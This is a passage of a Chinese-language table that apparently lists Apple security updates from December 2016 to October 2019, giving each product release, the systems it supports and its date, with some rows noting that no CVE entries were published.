| Windows 版 iCloud 7.14 | Windows 7 及更高版本 | 2019 年 10 月 7 日 |
| Windows 版 iCloud 10.7 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2019 年 10 月 7 日 |
| Safari 浏览器 13.0.2 这个更新没有已发布的 CVE 条目。 | macOS Mojave 10.14.6 和 macOS High Sierra 10.13.6 | 2019 年 10 月 7 日 |
| macOS Catalina 10.15 | MacBook(2015 年初及更新机型)、MacBook Air(2012 年中及更新机型)、MacBook Pro(2012 年中及更新机型)、Mac mini(2012 年末及更新机型)、iMac (2012 年末及更新机型)、iMac Pro(所有机型)和 Mac Pro(2013 年末及更新机型) | 2019 年 10 月 7 日 |
| SwiftNIO SSL 2.4.1 | Ubuntu 14.04 及更高版本上的 SwiftNIO SSL 2.0.0 至 2.4.0 | 2019 年 10 月 4 日 |
| watchOS 6.0.1 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 3 及更新机型 | 2019 年 9 月 30 日 |
| iOS 13.1.2 和 iPadOS 13.1.2 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2019 年 9 月 30 日 |
| iOS 13.1.1 和 iPadOS 13.1.1 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2019 年 9 月 27 日 |
| macOS Mojave 10.14.6 补充更新 2、安全性更新 2019-005 High Sierra、安全性更新 2019-005 Sierra | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.6 | 2019 年 9 月 26 日 |
| watchOS 5.3.2 | Apple Watch Series 1 和 Apple Watch Series 2 | 2019 年 9 月 26 日 |
| iOS 12.4.2 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代 | 2019 年 9 月 26 日 |
| iOS 13.1 和 iPadOS 13.1 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2019 年 9 月 24 日 |
| Safari 浏览器 13.0.1 | macOS Mojave 10.14.6 和 macOS High Sierra 10.13.6 | 2019 年 9 月 24 日 |
| Apple TV 软件 7.4 这个更新没有已发布的 CVE 条目。 | Apple TV(第 3 代) | 2019 年 9 月 24 日 |
| Apple tvOS 13 | Apple TV 4K 和 Apple TV HD | 2019 年 9 月 24 日 |
| Xcode 11.0 | macOS Mojave 10.14.4 及更高版本 | 2019 年 9 月 20 日 |
| watchOS 6 | Apple Watch Series 3 及更新机型 今年晚些时候,Apple Watch Series 1 和 2 也将支持 watchOS 6。 | 2019 年 9 月 19 日 |
| Safari 浏览器 13 | macOS Mojave 10.14.6 和 macOS High Sierra 10.13.6 | 2019 年 9 月 19 日 |
| iOS 13 | iPhone 6s 及更新机型 | 2019 年 9 月 19 日 |
| Windows 版 iTunes 12.10 这个更新没有已发布的 CVE 条目。 | Windows 7 及更高版本 | 2019 年 9 月 11 日 |
| watchOS 5.3.1 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 1 及更新机型 | 2019 年 8 月 26 日 |
| iOS 12.4.1 | iPhone 5s 及更新机型、iPad Air 及更新机型、iPod touch 第 6 代及更新机型 | 2019 年 8 月 26 日 |
| macOS Mojave 10.14.6 补充更新 | macOS Mojave 10.14.6 | 2019 年 8 月 26 日 |
| Apple tvOS 12.4.1 | Apple TV 4K 和 Apple TV HD | 2019 年 8 月 26 日 |
| SwiftNIO HTTP/2 1.5.0 | macOS Sierra 10.12 及更高版本和 Ubuntu 14.04 及更高版本上的 SwiftNIO HTTP/2 1.0.0 至 1.4.0 | 2019 年 8 月 13 日 |
| Windows 版 iCloud 10.6.1 这个更新没有已发布的 CVE 条目。 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2019 年 8 月 1 日 |
| Windows 版 iCloud 10.6 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2019 年 7 月 23 日 |
| Windows 版 iCloud 7.13 | Windows 7 及更高版本 | 2019 年 7 月 23 日 |
| Windows 版 iTunes 12.9.6 | Windows 7 及更高版本 | 2019 年 7 月 23 日 |
| iOS 12.4 | iPhone 5s 及更新机型、iPad Air 及更新机型、iPod touch 第 6 代及更新机型 | 2019 年 7 月 22 日 |
| iOS 10.3.4 这个更新没有已发布的 CVE 条目。 | iPhone 5、iPad(第 4 代)无线局域网 + 蜂窝网络 | 2019 年 7 月 22 日 |
| iOS 9.3.6 这个更新没有已发布的 CVE 条目。 | iPhone 4s、iPad mini(第 1 代)无线局域网 + 蜂窝网络、iPad 2 无线局域网 + 蜂窝网络、iPad(第 3 代)无线局域网 + 蜂窝网络 | 2019 年 7 月 22 日 |
| Apple tvOS 12.4 | Apple TV 4K 和 Apple TV HD | 2019 年 7 月 22 日 |
| Apple TV 软件 7.3.1 这个更新没有已发布的 CVE 条目。 | Apple TV(第 3 代) | 2019 年 7 月 22 日 |
| Safari 浏览器 12.1.2 | macOS Sierra 10.12.6、macOS High Sierra 10.13.6,随附于 macOS Mojave 10.14.6 中 | 2019 年 7 月 22 日 |
| macOS Mojave 10.14.6、安全性更新 2019-004 High Sierra、安全性更新 2019-004 Sierra | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.5 | 2019 年 7 月 22 日 |
| watchOS 5.3 | Apple Watch Series 1 及更新机型 | 2019 年 7 月 22 日 |
| AirPort 基站固件更新 7.8.1 | AirPort Express、AirPort Extreme 和 AirPort 时间返回舱基站 (802.11n) | 2019 年 6 月 20 日 |
| Windows 版 iCloud 10.4 | Windows 10(版本 18362.145)或更高版本 | 2019 年 6 月 11 日 |
| iOS 12.3.2 这个更新没有已发布的 CVE 条目。 | iPhone 8 Plus | 2019 年 6 月 10 日 |
| AirPort 基站固件更新 7.9.1 | AirPort Extreme 和 AirPort 时间返回舱基站 (802.11ac) | 2019 年 5 月 30 日 |
| Windows 版 iTunes 12.9.5 | Windows 7 及更高版本 | 2019 年 5 月 28 日 |
| Windows 版 iCloud 7.12 | Windows 7 及更高版本 | 2019 年 5 月 28 日 |
| iOS 12.3.1 这个更新没有已发布的 CVE 条目。 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2019 年 5 月 24 日 |
| watchOS 5.2.1 | Apple Watch Series 1 及更新机型 | 2019 年 5 月 13 日 |
| Safari 浏览器 12.1.1 | macOS Sierra 10.12.6、macOS High Sierra 10.13.6,随附于 macOS Mojave 10.14.5 中 | 2019 年 5 月 13 日 |
| Apple TV 软件 7.3 | Apple TV(第 3 代) | 2019 年 5 月 13 日 |
| Apple tvOS 12.3 | Apple TV 4K 和 Apple TV HD | 2019 年 5 月 13 日 |
| iOS 12.3 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2019 年 5 月 13 日 |
| macOS Mojave 10.14.5、安全性更新 2019-003 High Sierra、安全性更新 2019-003 Sierra | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.4 | 2019 年 5 月 13 日 |
| 安卓版 Texture 4.22.0.4 | 安卓版本 4.1 及更高版本 | 2019 年 4 月 11 日 |
| iOS 版 Texture 5.11.10 | iOS 9.0 及更高版本 | 2019 年 4 月 11 日 |
| Apple tvOS 12.2.1 这个更新没有已发布的 CVE 条目。 | Apple TV 4K 和 Apple TV HD | 2019 年 4 月 10 日 |
| 安全性更新 2019-002 High Sierra 和安全性更新 2019-002 Sierra | macOS Sierra 10.12.6 和 macOS High Sierra 10.13.6 | 2019 年 3 月 29 日 |
| watchOS 5.2 | Apple Watch Series 1 及更新机型 | 2019 年 3 月 27 日 |
| 安卓版 Shazam App 版本 9.25.0 | 安卓:9.24.1 | 2019 年 3 月 26 日 |
| iOS 版 Shazam App 版本 12.11.0 | iOS 10 及更高版本 | 2019 年 3 月 26 日 |
| Windows 版 iCloud 7.11 | Windows 7 及更高版本 | 2019 年 3 月 25 日 |
| Windows 版 iTunes 12.9.4 | Windows 7 及更高版本 | 2019 年 3 月 25 日 |
| Safari 浏览器 12.1 | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.4 | 2019 年 3 月 25 日 |
| macOS Mojave 10.14.4、安全性更新 2019-002 High Sierra、安全性更新 2019-002 Sierra | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.3 | 2019 年 3 月 25 日 |
| Apple tvOS 12.2 | Apple TV 4K 和 Apple TV HD(即以前的 Apple TV(第 4 代)) | 2019 年 3 月 25 日 |
| Xcode 10.2 | macOS High Sierra 10.13.6 及更高版本 | 2019 年 3 月 25 日 |
| iOS 12.2 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2019 年 3 月 25 日 |
| iOS 版快捷指令 2.1.3 | iOS 版快捷指令 2.1.2 | 2019 年 2 月 7 日 |
| macOS Mojave 10.14.3 补充更新 | macOS Mojave 10.14.3 | 2019 年 2 月 7 日 |
| iOS 12.1.4 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2019 年 2 月 7 日 |
| Windows 版 iTunes 12.9.3 | Windows 7 及更高版本 | 2019 年 1 月 24 日 |
| Windows 版 iCloud 7.10 | Windows 7 及更高版本 | 2019 年 1 月 22 日 |
| Safari 浏览器 12.0.3 | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.3 | 2019 年 1 月 22 日 |
| watchOS 5.1.3 | Apple Watch Series 1 及更新机型 | 2019 年 1 月 22 日 |
| Apple tvOS 12.1.2 | Apple TV 4K 和 Apple TV(第 4 代) | 2019 年 1 月 22 日 |
| macOS Mojave 10.14.3、安全性更新 2019-001 High Sierra、安全性更新 2019-001 Sierra | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.2 | 2019 年 1 月 22 日 |
| iOS 12.1.3 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2019 年 1 月 22 日 |
| iOS 12.1.2 这个更新没有已发布的 CVE 条目。 | iPhone 5s 及更新机型 | 2018 年 12 月 17 日 |
| watchOS 5.1.2 | Apple Watch Series 1 及更新机型 | 2018 年 12 月 6 日 |
| Windows 版 iCloud 7.9 | Windows 7 及更高版本 | 2018 年 12 月 5 日 |
| Safari 浏览器 12.0.2 | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.1 | 2018 年 12 月 5 日 |
| Windows 版 iTunes 12.9.2 | Windows 7 及更高版本 | 2018 年 12 月 5 日 |
| macOS Mojave 10.14.2、安全性更新 2018-003 High Sierra、安全性更新 2018-006 Sierra | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.1 | 2018 年 12 月 5 日 |
| iOS 版快捷指令 2.1.2 | iOS 12.0 及更高版本 | 2018 年 12 月 5 日 |
| Apple tvOS 12.1.1 | Apple TV 4K 和 Apple TV(第 4 代) | 2018 年 12 月 5 日 |
| iOS 12.1.1 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 12 月 5 日 |
| Windows 版 iCloud 7.8.1 这个更新没有已发布的 CVE 条目。 | Windows 7 及更高版本 | 2018 年 11 月 27 日 |
| 适用于 MacBook Air(2018 年)的 macOS Mojave 10.14.1 补充更新 这个更新没有已发布的 CVE 条目。 | MacBook Air(2018 年) | 2018 年 11 月 7 日 |
| watchOS 5.1.1 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 1 及更新机型 | 2018 年 11 月 5 日 |
| Safari 浏览器 12.0.1 | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14 | 2018 年 10 月 30 日 |
| Windows 版 iCloud 7.8 | Windows 7 及更高版本 | 2018 年 10 月 30 日 |
| Windows 版 iTunes 12.9.1 | Windows 7 及更高版本 | 2018 年 10 月 30 日 |
| watchOS 5.1 | Apple Watch Series 1 及更新机型 | 2018 年 10 月 30 日 |
| iOS 12.1 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 10 月 30 日 |
| Apple tvOS 12.1 | Apple TV 4K 和 Apple TV(第 4 代) | 2018 年 10 月 30 日 |
| macOS Mojave 10.14.1、安全性更新 2018-002 High Sierra、安全性更新 2018-005 Sierra | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14 | 2018 年 10 月 30 日 |
| Windows 版 iCloud 7.7 | Windows 7 及更高版本 | 2018 年 10 月 8 日 |
| iOS 12.0.1 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 10 月 8 日 |
| watchOS 5.0.1 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 1 及更新机型 | 2018 年 9 月 27 日 |
| macOS Mojave 10.14 | MacBook(2015 年初及更新机型)、MacBook Air(2012 年中及更新机型)、MacBook Pro(2012 年中及更新机型)、Mac mini(2012 年末及更新机型)、iMac(2012 年末及更新机型)、iMac Pro(所有机型)、Mac Pro(2013 年末、2010 年中和 2012 年中机型,且配备兼容 Metal 的推荐图形处理器,包括 MSI Gaming Radeon RX 560 和 Sapphire Radeon PULSE RX 580) | 2018 年 9 月 24 日 |
| Xcode 10 | macOS High Sierra 10.13.6 或更高版本 | 2018 年 9 月 17 日 |
| iOS 版 Apple 支持 2.4 | iOS 11.0 及更高版本 | 2018 年 9 月 17 日 |
| Safari 浏览器 12 | macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14 | 2018 年 9 月 17 日 |
| watchOS 5 | Apple Watch Series 1 及更新机型 | 2018 年 9 月 17 日 |
| Apple tvOS 12 | Apple TV 4K 和 Apple TV(第 4 代) | 2018 年 9 月 17 日 |
| iOS 12 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 9 月 17 日 |
| Windows 版 iTunes 12.9 | Windows 7 及更高版本 | 2018 年 9 月 12 日 |
| 适用于 MacBook Pro(2018 年)的 macOS High Sierra 10.13.6 补充更新 2 | 配备触控栏的 MacBook Pro(2018 年) | 2018 年 8 月 28 日 |
| Windows 版 iTunes 12.8 | Windows 7 及更高版本 | 2018 年 7 月 9 日 |
| Windows 版 iCloud 7.6 | Windows 7 及更高版本 | 2018 年 7 月 9 日 |
| Safari 浏览器 11.1.2 | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.6 | 2018 年 7 月 9 日 |
| macOS High Sierra 10.13.6、安全性更新 2018-004 Sierra、安全性更新 2018-004 El Capitan | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.5 | 2018 年 7 月 9 日 |
| watchOS 4.3.2 | 所有 Apple Watch 机型 | 2018 年 7 月 9 日 |
| Apple tvOS 11.4.1 | Apple TV 4K 和 Apple TV(第 4 代) | 2018 年 7 月 9 日 |
| iOS 11.4.1 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 7 月 9 日 |
| 启动转换 6.4.0 的 Wi-Fi 更新 | MacBook(2009 年末及更新机型)、MacBook Pro(2010 年中及更新机型)、MacBook Air(2010 年末及更新机型)、Mac mini(2010 年中及更新机型)、iMac(2009 年末及更新机型)和 Mac Pro(2010 年中及更新机型) | 2018 年 7 月 5 日 |
| SwiftNIO 1.8.0 | macOS Sierra 10.12 及更高版本、Ubuntu 14.04 及更高版本 | 2018 年 6 月 27 日 |
| Xcode 9.4.1 | macOS High Sierra 10.13.2 或更高版本 | 2018 年 6 月 13 日 |
| Windows 版 iCloud 7.5 | Windows 7 及更高版本 | 2018 年 6 月 1 日 |
| Safari 浏览器 11.1.1 | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.4 | 2018 年 6 月 1 日 |
| macOS High Sierra 10.13.5、安全性更新 2018-003 Sierra、安全性更新 2018-003 El Capitan | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.4 | 2018 年 6 月 1 日 |
| iOS 11.4 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 5 月 29 日 |
| watchOS 4.3.1 | 所有 Apple Watch 机型 | 2018 年 5 月 29 日 |
| Windows 版 iTunes 12.7.5 | Windows 7 及更高版本 | 2018 年 5 月 29 日 |
| Apple tvOS 11.4 | Apple TV 4K 和 Apple TV(第 4 代) | 2018 年 5 月 29 日 |
| 适用于 Ubuntu 14.04 的安全性更新 2018-001 Swift 4.1.1 | Ubuntu 14.04 | 2018 年 5 月 4 日 |
| Safari 浏览器 11.1 (版本 11605.1.33.1.4、12605.1.33.1.4 和 13605.1.33.1.4) | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.4 | 2018 年 4 月 24 日 |
| 安全性更新 2018-001 | macOS High Sierra 10.13.4 | 2018 年 4 月 24 日 |
| iOS 11.3.1 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 4 月 24 日 |
| Windows 版 iCloud 7.4 | Windows 7 及更高版本 | 2018 年 3 月 29 日 |
| Safari 浏览器 11.1 | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.4 | 2018 年 3 月 29 日 |
| macOS High Sierra 10.13.4、安全性更新 2018-002 Sierra 和安全性更新 2018-002 El Capitan | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.3 | 2018 年 3 月 29 日 |
| Windows 版 iTunes 12.7.4 | Windows 7 及更高版本 | 2018 年 3 月 29 日 |
| Xcode 9.3 | macOS High Sierra 10.13.2 或更高版本 | 2018 年 3 月 29 日 |
| Apple tvOS 11.3 | Apple TV 4K 和 Apple TV(第 4 代) | 2018 年 3 月 29 日 |
| watchOS 4.3 | 所有 Apple Watch 机型 | 2018 年 3 月 29 日 |
| iOS 11.3 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 3 月 29 日 |
| Apple tvOS 11.2.6 | Apple TV 4K 和 Apple TV(第 4 代) | 2018 年 2 月 19 日 |
| watchOS 4.2.3 | 所有 Apple Watch 机型 | 2018 年 2 月 19 日 |
| iOS 11.2.6 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 2 月 19 日 |
| macOS High Sierra 10.13.3 补充更新 | macOS High Sierra 10.13.3 | 2018 年 2 月 19 日 |
| Windows 版 iTunes 12.7.3 | Windows 7 及更高版本 | 2018 年 1 月 23 日 |
| Windows 版 iCloud 7.3 | Windows 7 及更高版本 | 2018 年 1 月 23 日 |
| Safari 浏览器 11.0.3 | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.3 | 2018 年 1 月 23 日 |
| watchOS 4.2.2 | 所有 Apple Watch 机型 | 2018 年 1 月 23 日 |
| iOS 11.2.5 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 1 月 23 日 |
| macOS High Sierra 10.13.3、安全性更新 2018-001 Sierra 和安全性更新 2018-001 El Capitan | macOS High Sierra 10.13.2、macOS Sierra 10.12.6 和 OS X El Capitan 10.11.6 | 2018 年 1 月 23 日 |
| Apple tvOS 11.2.5 | Apple TV 4K 和 Apple TV(第 4 代) | 2018 年 1 月 23 日 |
| macOS High Sierra 10.13.2 补充更新 | macOS High Sierra 10.13.2 | 2018 年 1 月 8 日 |
| Safari 浏览器 11.0.2 (版本 11604.4.7.1.6 和 2604.4.7.1.6) | OS X El Capitan 10.11.6 和 macOS Sierra 10.12.6 | 2018 年 1 月 8 日 |
| iOS 11.2.2 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2018 年 1 月 8 日 |
| Windows 版 iCloud 7.2 | Windows 7 及更高版本 | 2017 年 12 月 13 日 |
| Apple tvOS 11.2.1 | Apple TV 4K 和 Apple TV(第 4 代) | 2017 年 12 月 13 日 |
| iOS 11.2.1 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2017 年 12 月 13 日 |
| AirPort 基站固件更新 7.7.9 | AirPort Extreme 和 AirPort 时间返回舱基站 (802.11ac) | 2017 年 12 月 12 日 |
| AirPort 基站固件更新 7.6.9 | AirPort Express、AirPort Extreme 和 AirPort 时间返回舱基站 (802.11n) | 2017 年 12 月 12 日 |
| Windows 版 iTunes 12.7.2 | Windows 7 及更高版本 | 2017 年 12 月 6 日 |
| macOS High Sierra 10.13.2、安全性更新 2017-002 Sierra 和安全性更新 2017-005 El Capitan | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.1 | 2017 年 12 月 6 日 |
| Safari 浏览器 11.0.2 | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13 | 2017 年 12 月 6 日 |
| watchOS 4.2 | 所有 Apple Watch 机型 | 2017 年 12 月 5 日 |
| Xcode 9.2 | macOS Sierra 10.12.6 或更高版本 | 2017 年 12 月 4 日 |
| Apple tvOS 11.2 | Apple TV 4K 和 Apple TV(第 4 代) | 2017 年 12 月 4 日 |
| iOS 11.2 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2017 年 12 月 2 日 |
| 安全性更新 2017-001 | macOS High Sierra 10.13 和 macOS High Sierra 10.13.1 | 2017 年 11 月 29 日 |
| iOS 11.1.2 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2017 年 11 月 16 日 |
| iOS 11.1.1 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2017 年 11 月 9 日 |
| Windows 版 iCloud 7.1 | Windows 7 及更高版本 | 2017 年 10 月 31 日 |
| Windows 版 iTunes 12.7.1 | Windows 7 及更高版本 | 2017 年 10 月 31 日 |
| Safari 浏览器 11.0.1 | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13 | 2017 年 10 月 31 日 |
| Apple tvOS 11.1 | Apple TV 4K 和 Apple TV(第 4 代) | 2017 年 10 月 31 日 |
| macOS High Sierra 10.13.1、安全性更新 2017-001 Sierra 和安全性更新 2017-004 El Capitan | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13 | 2017 年 10 月 31 日 |
| iOS 11.1 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2017 年 10 月 31 日 |
| watchOS 4.1 | 所有 Apple Watch 机型 | 2017 年 10 月 31 日 |
| iOS 11.0.3 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2017 年 10 月 11 日 |
| macOS High Sierra 10.13 补充更新 | macOS High Sierra 10.13 | 2017 年 10 月 5 日 |
| watchOS 4.0.1 | Apple Watch Series 3(GPS + 蜂窝网络) | 2017 年 10 月 4 日 |
| iOS 11.0.2 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2017 年 10 月 3 日 |
| iOS 11.0.1 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2017 年 9 月 26 日 |
| macOS 服务器 5.4 | macOS High Sierra 10.13 | 2017 年 9 月 25 日 |
| Windows 版 iCloud 7.0 | Windows 7 及更高版本 | 2017 年 9 月 25 日 |
| macOS High Sierra 10.13 | OS X Mountain Lion 10.8 及更高版本 | 2017 年 9 月 25 日 |
| Xcode 9 | macOS Sierra 10.12.6 或更高版本 | 2017 年 9 月 19 日 |
| Apple tvOS 11 | Apple TV(第 4 代) | 2017 年 9 月 19 日 |
| watchOS 4 | 所有 Apple Watch 机型 | 2017 年 9 月 19 日 |
| Safari 浏览器 11 | OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13 | 2017 年 9 月 19 日 |
| iOS 11 | iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代 | 2017 年 9 月 19 日 |
| iTunes 12.7 | OS X Yosemite 10.10.5 及更高版本 | 2017 年 9 月 12 日 |
| Windows 版 iTunes 12.7 | Windows 7 及更高版本 | 2017 年 9 月 12 日 |
| iOS 版 Apple 支持 1.2 | iOS 9.0 及更高版本 | 2017 年 8 月 30 日 |
| 启动转换 6.1 的 Wi-Fi 更新 | 运行“启动转换”时的 MacBook Air(2010 年末及更新机型)、MacBook Pro(2010 年末及更新机型)、Mac mini(2010 年中及更新机型)、iMac(2010 年中及更新机型)和 MacBook(2010 年中及更新机型) | 2017 年 7 月 19 日 |
| Apple tvOS 10.2.2 | Apple TV(第 4 代) | 2017 年 7 月 19 日 |
| Windows 版 iTunes 12.6.2 | Windows 7 及更高版本 | 2017 年 7 月 19 日 |
| Windows 版 iCloud 6.2.2 | Windows 7 及更高版本 | 2017 年 7 月 19 日 |
| Safari 浏览器 10.1.2 | OS X Yosemite 10.10.5、OS X El Capitan 10.11.6 和 macOS Sierra 10.12.6 | 2017 年 7 月 19 日 |
| macOS Sierra 10.12.6、安全性更新 2017-003 El Capitan 和安全性更新 2017-003 Yosemite | macOS Sierra 10.12.5、OS X El Capitan 10.11.6 和 OS X Yosemite 10.10.5 | 2017 年 7 月 19 日 |
| iOS 10.3.3 | iPhone 5 及更新机型、iPad 第 4 代及更新机型和 iPod touch 第 6 代 | 2017 年 7 月 19 日 |
| watchOS 3.2.3 | 所有 Apple Watch 机型 | 2017 年 7 月 19 日 |
| Apple tvOS 10.2.1 | Apple TV(第 4 代) | 2017 年 5 月 15 日 |
| Windows 版 iCloud 6.2.1 | Windows 7 及更高版本 | 2017 年 5 月 15 日 |
| Safari 浏览器 10.1.1 | OS X Yosemite 10.10.5、OS X El Capitan 10.11.6 和 macOS Sierra 10.12.5 | 2017 年 5 月 15 日 |
| Windows 版 iTunes 12.6.1 | Windows 7 及更高版本 | 2017 年 5 月 15 日 |
| watchOS 3.2.2 | 所有 Apple Watch 机型 | 2017 年 5 月 15 日 |
| macOS Sierra 10.12.5、安全性更新 2017-002 El Capitan 和安全性更新 2017-002 Yosemite | macOS Sierra 10.12.4、OS X El Capitan 10.11.6 和 OS X Yosemite 10.10.5 | 2017 年 5 月 15 日 |
| iOS 10.3.2 | iPhone 5 及更新机型、iPad 第 4 代及更新机型和 iPod touch 第 6 代 | 2017 年 5 月 15 日 |
| 安卓版 Apple Music 2.0 | 安卓版本 4.3 及更高版本 | 2017 年 4 月 4 日 |
| iOS 10.3.1 | iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型 | 2017 年 4 月 3 日 |
| Windows 版 iCloud 6.2 | Windows 7 及更高版本 | 2017 年 3 月 28 日 |
| macOS 服务器 5.3 | macOS 10.12.4 及更高版本 | 2017 年 3 月 27 日 |
| Apple tvOS 10.2 | Apple TV(第 4 代) | 2017 年 3 月 27 日 |
| watchOS 3.2 | 所有 Apple Watch 机型 | 2017 年 3 月 27 日 |
| iOS 10.3 | iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型 | 2017 年 3 月 27 日 |
| macOS Sierra 10.12.4、安全性更新 2017-001 El Capitan 和安全性更新 2017-001 Yosemite | macOS Sierra 10.12.3、OS X El Capitan v10.11.6 和 OS X Yosemite v10.10.5 | 2017 年 3 月 27 日 |
| Safari 浏览器 10.1 | OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12.4 | 2017 年 3 月 27 日 |
| Mac 版 Pages 文稿 6.1、Numbers 表格 4.1 和 Keynote 讲演 7.1 以及 iOS 版 Pages 文稿 3.1、Numbers 表格 3.1 和 Keynote 讲演 3.1 | macOS 10.12 及更高版本、iOS 10.0 及更高版本 | 2017 年 3 月 27 日 |
| Windows 版 iTunes 12.6 | Windows 7 及更高版本 | 2017 年 3 月 21 日 |
| iTunes 12.6 | OS X Mavericks v10.9.5 及更高版本 | 2017 年 3 月 21 日 |
| Apple 远程桌面 3.9 | OS X Yosemite v10.10.5 及更高版本 | 2017 年 2 月 21 日 |
| Logic Pro X 10.3.1 | OS X El Capitan v10.11 及更高版本(64 位) | 2017 年 2 月 21 日 |
| 库乐队 10.1.6 | OS X Yosemite v10.10 及更高版本 | 2017 年 2 月 13 日 |
| Windows 版 iTunes 12.5.5 | Windows 7 及更高版本 | 2017 年 1 月 23 日 |
| Safari 浏览器 10.0.3 | OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12.3 | 2017 年 1 月 23 日 |
| Windows 版 iCloud 6.1.1 | Windows 7 及更高版本 | 2017 年 1 月 23 日 |
| macOS Sierra 10.12.3 | macOS Sierra 10.12.2 | 2017 年 1 月 23 日 |
| iOS 10.2.1 | iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型 | 2017 年 1 月 23 日 |
| Apple tvOS 10.1.1 | Apple TV(第 4 代) | 2017 年 1 月 23 日 |
| watchOS 3.1.3 | 所有 Apple Watch 机型 | 2017 年 1 月 23 日 |
| 库乐队 10.1.5 | OS X Yosemite v10.10 及更高版本 | 2017 年 1 月 18 日 |
| Logic Pro X 10.3 | OS X El Capitan v10.11 及更高版本(64 位) | 2017 年 1 月 18 日 |
| Windows 版 iCloud 6.1 | Windows 7 及更高版本 | 2016 年 12 月 13 日 |
| Safari 浏览器 10.0.2 | OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12.2 | 2016 年 12 月 13 日 |
| Windows 版 iTunes 12.5.4 | Windows 7 及更高版本 | 2016 年 12 月 13 日 |
